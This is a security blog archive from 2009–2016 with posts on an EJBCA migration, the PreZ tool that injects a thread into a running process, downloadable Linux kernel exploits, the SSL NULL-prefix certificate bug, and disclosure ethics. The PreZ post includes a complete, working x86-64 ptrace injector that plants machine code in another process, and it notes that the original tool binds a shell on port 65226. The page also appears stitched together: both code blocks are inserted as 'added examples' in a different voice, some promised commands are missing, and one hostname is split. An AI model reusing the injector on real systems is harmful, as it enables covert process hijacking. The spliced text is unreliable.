Archive

Archive for the ‘Security’ Category

Migrating an EJBCA database from H2 to MySQL

May 13th, 2016 No comments

As part of a job I had to migrate an EJBCA database from H2 to MySQL. Some coworkers who tried migrating the database could not complete the job because most tools they used couldn’t open the H2 database or had problems with binary blobs. Googling ‘ejbca migrate h2 to mysql’ yielded the following result: https://sourceforge.net/p/ejbca/discussion/123123/thread/c9fb72aa/. According to Tomas Gustavsson, author of EJBCA, this is not trivial and “PrimeKey has developed a standalone database dump/restore tool that can be used to dump from one database and import into another. This is only available with a commercial support subscription though.” As far as I know, commercial support costs 9k per year. So, I decided to write my own migration tool. After less than 80 lines of Java code everything was complete, and I migrated my database without any problems. You can download the tool here. There are no warranties that it will work correctly, but in my case it worked just fine. You can run it using the following command:

It may also work with other databases; you just have to use the correct connector and connection URL. If you try it with another database, such as PostgreSQL, please leave a comment.

Categories: PKI, Security Tags:

PreZ: my new injector!

March 25th, 2010 5 comments

Together with my presentation at 0x375 0x2 (check the previous post), I wrote a proof-of-concept program, PreZ! What it does is create a new thread in a running process. I will give a short description of the way it works. The images below are taken from the presentation and refer to the Linux version, but the same concept is used in all versions, i.e. Linux, FreeBSD and OpenSolaris.

PreZ consists of three parts: the injector, the thread creation code and the code that will be executed in the new thread (the shellcode). The following steps take place each time you run PreZ.

At the beginning the injector stops the traced process, the ‘victim’. Its state is saved (the registers, plus some other things in the OpenSolaris version), together with a copy of the code at the address the EIP register points to. That code is then overwritten with the other two parts, giving the modified address space shown in the image above. Execution then continues and the code we just injected runs.

What the new code does is mmap a new region with read, write and execute permissions (the orange area in the image above). Then the shellcode at the end is copied to this new location. All this still runs in a single thread (the purple thread of execution in the image). A new thread is then spawned, and now we have two different threads of execution, the green and the pink in the image above.

Finally, the new thread jumps to the location where we copied the shellcode, while the original thread executes an int3 instruction. When this instruction is executed, the injector catches the resulting trap and knows that the thread has been created successfully. The code read at the beginning is restored, the saved state is restored, and execution continues. All of this is transparent to the original process, whose own code has no way of telling that injected code has been executed (the extra thread is still visible from outside, for example under /proc/<pid>/task).

PreZ v1.0 can be downloaded from this link. The sample code for the new thread listens for a connection on port 65226 and, when it accepts one, spawns a shell. You can do much more; this is just simple code to demonstrate the injection process.
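The steps above, reimplemented as an added example that is not PreZ’s own code: a minimal injector for 64-bit Linux (PreZ as presented targets 32-bit, hence EIP above; here it is RIP) that follows the same plan: attach and save the victim’s state, back up the bytes at the instruction pointer, overwrite them with a small stub, have the victim mmap an rwx region, copy the thread body there, clone() a thread that jumps into it, and catch the int3 the original thread then executes before putting everything back. Instead of binding a shell on port 65226, the thread body constructed here just writes a line to a pipe inherited from the injector so the result can be checked. Assumptions: x86-64 Linux with glibc, and permission to ptrace the target (the demo forks its own victim, which Yama’s default ptrace_scope allows); the STUB and payload bytes are hand-assembled for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <poll.h>
#include <signal.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
/* Stub written over the victim's code at RIP: syscall; test rax,rax; jnz +2; jmp rbx; int3.  The calling
 * thread (rax = an address or a tid) hits int3 so the injector regains control; a clone() child (rax == 0)
 * jumps to rbx, which points at the copied thread body. */
static const unsigned char STUB[] = {0x0f,0x05, 0x48,0x85,0xc0, 0x75,0x02, 0xff,0xe3, 0xcc};
#define REGION 0x4000UL  /* rwx area: thread body at the bottom, the new thread's stack at the top */
/* Thread body (constructed for this example): write(fd, "injected\n", 9); exit(0). sys_exit (60) ends
 * only the calling thread, so the victim keeps running. fd is patched in, little-endian. */
size_t build_payload(int fd, unsigned char *out) {
    static const unsigned char code[] = {
        0xbf,0,0,0,0, 0x48,0x8d,0x35,0x15,0,0,0,  /* mov edi, fd ; lea rsi, [rip+0x15] (msg)   */
        0xba,9,0,0,0, 0xb8,1,0,0,0, 0x0f,0x05,    /* mov edx, 9 ; mov eax, 1 ; syscall (write)  */
        0x31,0xff, 0xb8,60,0,0,0, 0x0f,0x05,      /* xor edi, edi ; mov eax, 60 ; syscall (exit) */
        'i','n','j','e','c','t','e','d','\n'};
    memcpy(out, code, sizeof code);
    memcpy(out + 1, &fd, 4);
    return sizeof code;
}
#if defined(__linux__) && defined(__x86_64__)
static int peek(pid_t pid, unsigned long long addr, void *buf, size_t len) {  /* len % 8 == 0 */
    errno = 0;
    for (size_t i = 0; i < len; i += sizeof(long)) {
        long w = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + i), 0);
        if (w == -1 && errno) return -1;
        memcpy((char *)buf + i, &w, sizeof w);
    }
    return 0;
}
static int poke(pid_t pid, unsigned long long addr, const void *buf, size_t len) {
    for (size_t i = 0; i < len; i += sizeof(long)) {
        long w;
        memcpy(&w, (const char *)buf + i, sizeof w);
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + i), (void *)w) < 0) return -1;
    }
    return 0;
}
/* Run the stub with *regs, wait for its int3, return the syscall result; orig_rax = -1 keeps the kernel
 * from "restarting" the syscall the victim was blocked in when we attached. */
static int remote_syscall(pid_t pid, unsigned long long rip, struct user_regs_struct *regs,
                          unsigned long long *ret) {
    int st;
    regs->rip = rip;
    regs->orig_rax = (unsigned long long)-1;
    if (ptrace(PTRACE_SETREGS, pid, 0, regs) < 0 || ptrace(PTRACE_CONT, pid, 0, 0) < 0) return -1;
    if (waitpid(pid, &st, 0) < 0 || !WIFSTOPPED(st) || WSTOPSIG(st) != SIGTRAP) return -1;
    if (ptrace(PTRACE_GETREGS, pid, 0, regs) < 0) return -1;
    *ret = regs->rax;
    return 0;
}
/* 0 = thread created, 1 = ptrace not permitted here, -1 = failed after attaching. */
int inject(pid_t pid, int fd) {
    struct user_regs_struct saved, regs;
    unsigned char orig[16], patched[16], body[64] = {0};
    unsigned long long base, tid; int st, rc = -1;
    if (ptrace(PTRACE_ATTACH, pid, 0, 0) < 0) return 1;
    if (waitpid(pid, &st, 0) < 0 || !WIFSTOPPED(st) || ptrace(PTRACE_GETREGS, pid, 0, &saved) < 0) goto out;
    if (peek(pid, saved.rip, orig, sizeof orig) < 0) goto out;      /* 1. back up the code at RIP ... */
    memcpy(patched, orig, sizeof patched); memcpy(patched, STUB, sizeof STUB);
    if (poke(pid, saved.rip, patched, sizeof patched) < 0) goto out; /* ... and overwrite it with the stub */
    /* 2. mmap(NULL, REGION, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) */
    regs = saved; regs.rax = 9; regs.rdi = 0; regs.rsi = REGION; regs.rdx = 7;
    regs.r10 = 0x22; regs.r8 = (unsigned long long)-1; regs.r9 = 0;
    if (remote_syscall(pid, saved.rip, &regs, &base) < 0 || base > (unsigned long long)-4096) goto restore;
    /* 3. copy the thread body into the new region (poke works in whole words) */
    if (poke(pid, base, body, (build_payload(fd, body) + 7) & ~7UL) < 0) goto restore;
    /* 4. clone(CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM, stack, 0, 0, 0);
     *    the new thread wakes up inside the stub with rax == 0 and jumps to rbx = thread body */
    regs = saved; regs.rax = 56; regs.rdi = 0x50f00; regs.rsi = base + REGION;
    regs.rdx = 0; regs.r10 = 0; regs.r8 = 0; regs.rbx = base;
    if (remote_syscall(pid, saved.rip, &regs, &tid) < 0 || tid > (unsigned long long)-4096) goto restore;
    rc = 0;
restore:  /* 5. original bytes and registers go back; the main thread resumes where it was */
    poke(pid, saved.rip, orig, sizeof orig);
    ptrace(PTRACE_SETREGS, pid, 0, &saved);
out:
    ptrace(PTRACE_DETACH, pid, 0, 0);
    return rc;
}
#else
int inject(pid_t pid, int fd) { (void)pid; (void)fd; return 1; }  /* x86-64 Linux only */
#endif
/* Fork a victim that sleeps in pause(), inject into it, and check what the new thread writes. */
int inject_demo(void) {
    int pfd[2], rc; char buf[16] = {0};
    if (pipe(pfd) < 0) return -1;
    pid_t pid = fork();
    if (pid == 0) { close(pfd[0]); for (;;) pause(); }
    if (pid < 0) return -1;
    close(pfd[1]);
    usleep(100000);                                  /* let the victim settle into pause() */
    rc = inject(pid, pfd[1]);
    struct pollfd p = { pfd[0], POLLIN, 0 };
    if (rc == 0 && (poll(&p, 1, 5000) <= 0 || read(pfd[0], buf, sizeof buf - 1) <= 0 ||
                    strcmp(buf, "injected\n") != 0)) rc = -1;
    kill(pid, SIGKILL); waitpid(pid, NULL, 0); close(pfd[0]);
    return rc;
}
int main(void) { return inject_demo() == 0 ? 0 : 1; }
```

Two details matter in practice. The same stub serves both remote calls because a syscall result is never 0 for mmap (an address) or for the clone parent (a tid), so only the clone child takes the jmp rbx path. And orig_rax must be cleared before each injected call: when you attach to a process blocked in a syscall, the kernel would otherwise rewind RIP by two bytes on resume to restart that syscall, landing in the middle of the stub; restoring the saved registers at the end puts the original orig_rax back, so the interrupted syscall is restarted cleanly once the original bytes are in place.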

Categories: Linux, Programming, Security Tags:

My 0x375 presentation – injecting code at a running process!

March 22nd, 2010 2 comments

It’s been a long time since I last posted to my blog. Unfortunately, I’ve been too busy to write something, even though I had some ideas. So, here is my first post after more than a month of absence!

I recently gave a presentation at 0x375 (Thessaloniki Tech Talk Sessions). You can find more info about 0x375 at the grhack site. In short, it is a series of tech talk sessions where anyone can present their work on a subject. Submissions are open to everyone. There are no regular dates, but if you watch the site you can find out when and where the next event will take place (always in Thessaloniki and, so far, at the Aristotle University).

My presentation was about injecting code into a running process and running it as a separate thread. You can download it here. Since 0x375 takes place in Greece the presentation is written in Greek; sorry if you can’t read it! In short, what the technique I presented and the accompanying program do is create a new thread in a running process. The presentation talks about Linux; however, FreeBSD and OpenSolaris versions are ready. I will put them online soon so you can check them out. Wait for the next post!

Categories: Linux, Programming, Security Tags:

Linux kernel pipe NULL pointer dereference exploit (CVE-2009-3547)

November 5th, 2009 6 comments

Another exploit for the kernel pipe NULL pointer dereference bug. This one is inspired by Spender‘s great work on his enlightenment framework. It seems to exist in every 2.6 and 2.4 kernel version I’ve tested! Another sock_sendpage, maybe? This sample exploit only works for versions >= 2.6.17. You can download it here. As usual, there is more information in the code. This time there are some funny quotes too! I haven’t done a lot of tests, so any feedback, and especially the versions you have tested it on and where it worked, is welcome!

EDIT: A new version is out. It adds detection of kernels compiled with spinlock debugging options. Download it here.

Categories: Exploits, Security Tags:

Ecryptfs NULL pointer dereference exploit (CVE-2009-2908)

October 17th, 2009 1 comment

Commit afc2b6932f48f200736d3e36ad66fee0ec733136 in the Linux kernel concerns a NULL pointer dereference that happens under certain circumstances. As many of you already know, NULL pointer dereferences are exploitable and are actually a “hot topic” lately. You can find a lot of references, such as Julien Tinnes’ great blog post, Brad Spengler‘s (spender’s) enlightenment framework, etc. I haven’t seen any exploits for this bug yet, so I’ve written one. You can download it here. I won’t go into details here; you can read the source code, which is full of helpful comments. A description of the exploit would actually be a copy/paste of all the comments, so it’s better to read the entire source code!

Categories: Exploits, Security Tags:

The NULL certificate prefix bug

October 3rd, 2009 5 comments

Some months ago, at Black Hat 2009, Moxie Marlinspike and Dan Kaminsky presented a vulnerability that exists in some implementations of SSL.

The concept is pretty simple: you request a certificate with a CN (common name) of www.paypal.com\x00.example.com. Getting one issued can be easy, especially from public key infrastructures that companies operate for their internal needs, where server certificates are issued automatically as long as the CN is a host under a specific domain: the CA handles the CN with its proper ASN.1 length, so what it sees is a host under example.com, a domain the attacker controls. However, since many SSL implementations treat the CN as a C string and validate the remote host with strcmp, they only compare the part before the \x00! So a malicious user can simply obtain such a certificate and, combined with DNS or ARP spoofing, mount a man-in-the-middle attack. Furthermore, it is possible to obtain a certificate with a CN such as *.pa
ypal.com\x00.example.com, which will match all hosts under the paypal.com domain, or even the CN *\x00.example.com, which will match… everything! Jacob Appelbaum created such a certificate and posted it to the Noisebridge-discuss mailing list.

Firefox 3.5.2 and 3.0.13 have fixed this vulnerability; however, I checked with the Internet Explorer browser today and it still has this bug. The test was done on a friend’s PC, so I don’t know exactly which patches he has applied or when he last ran Windows Update. It is very interesting that it probably uses the strcpy function to copy the value of the CN into the buffer where it keeps the certificate information, so when you try to view it you only see www.paypal.com!
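Below is an added example, written for this page rather than taken from the program mentioned here, that shows both sides of the bug in C: a naive hostname check that hands the CN to the C string functions, beside a check that trusts the ASN.1 length instead. The CN values are constructed for the test, not real certificates, and the wildcard rules in the safe version (leftmost label only, at least two labels after it) are my choice, not something the page specifies.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#include <strings.h>

/* A CN as it sits in the certificate: bytes plus an explicit length. ASN.1 strings carry
 * their length, so "www.paypal.com\0.example.com" is a perfectly valid value. */
typedef struct { const unsigned char *data; size_t len; } asn1_string;
#define CN(lit) { (const unsigned char *)(lit), sizeof(lit) - 1 }  /* sizeof keeps the embedded NUL */

/* Constructed CNs for the demonstration (not from real certificates). */
static const asn1_string CN_HONEST     = CN("www.example.com");
static const asn1_string CN_NUL_PAYPAL = CN("www.paypal.com\0.example.com");
static const asn1_string CN_NUL_WILD   = CN("*.paypal.com\0.example.com");
static const asn1_string CN_NUL_ALL    = CN("*\0.example.com");

static bool ends_with_ci(const char *s, const char *suffix) {
    size_t sl = strlen(s), xl = strlen(suffix);
    return xl <= sl && strcasecmp(s + sl - xl, suffix) == 0;
}

/* The bug: the CN is handed to C string functions, so everything after the first NUL
 * vanishes, and a CN of "*\0..." degenerates into "*", a match for every host. */
bool match_host_vulnerable(const asn1_string *cn, const char *host) {
    const char *name = (const char *)cn->data;          /* the string functions stop at the NUL */
    if (name[0] == '*') return ends_with_ci(host, name + 1);
    return strcasecmp(name, host) == 0;
}

/* The fix: trust the length, never the NUL. Reject any CN with an embedded NUL (what the
 * Firefox 3.5.2/3.0.13 fix amounts to), compare exactly cn->len bytes, and only accept a
 * wildcard as the whole leftmost label with at least two labels after it. */
bool match_host_safe(const asn1_string *cn, const char *host) {
    size_t hlen = strlen(host);
    if (cn->len == 0 || memchr(cn->data, '\0', cn->len) != NULL) return false;
    if (cn->data[0] == '*') {
        if (cn->len < 2 || cn->data[1] != '.') return false;
        const char *suffix = (const char *)cn->data + 1;     /* ".paypal.com", cn->len - 1 bytes */
        size_t slen = cn->len - 1, dots = 0;
        for (size_t i = 0; i < slen; i++) dots += suffix[i] == '.';
        if (dots < 2) return false;                          /* no "*.com" */
        const char *dot = strchr(host, '.');                 /* the wildcard covers one label only */
        if (!dot || dot == host) return false;
        return strlen(dot) == slen && strncasecmp(dot, suffix, slen) == 0;
    }
    return hlen == cn->len && strncasecmp((const char *)cn->data, host, hlen) == 0;
}
```

On the issuing side the embedded NUL is just as easy to produce: any API that takes the CN with an explicit length rather than as a C string will encode it (OpenSSL’s X509_NAME_add_entry_by_txt, for instance, takes a len argument), which is why a request like the one described above is trivial to build.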

You can use the following program to create your own certificate requests. You run it as follows:

At the output you will get the private key and the certificate request.

Categories: Programming, Security Tags:

Full disclosure… or not?

September 26th, 2009 2 comments

One of the biggest problems I sometimes face is what I should do when I find a bug. I recently found a bug in Linux kernel version 2.6.30, which was fixed in 2.6.31, but I only told a friend of mine about it. Posting the description to a mailing list or on my blog would mean that everybody could write an exploit and use it to hack into systems. I could also write a patch that could be merged into the next release. For the moment I chose not to do anything until the next kernel release, and if it wasn’t fixed I would then decide what to do.
I face the same problem when I write security-related programs. For example, a rootkit that can be used for malicious purposes can also be used to demonstrate bugs in the design of an operating system. Should a program like this be released?
I have created the following two polls. I believe that the results are going to be very interesting!

Categories: Security Tags:
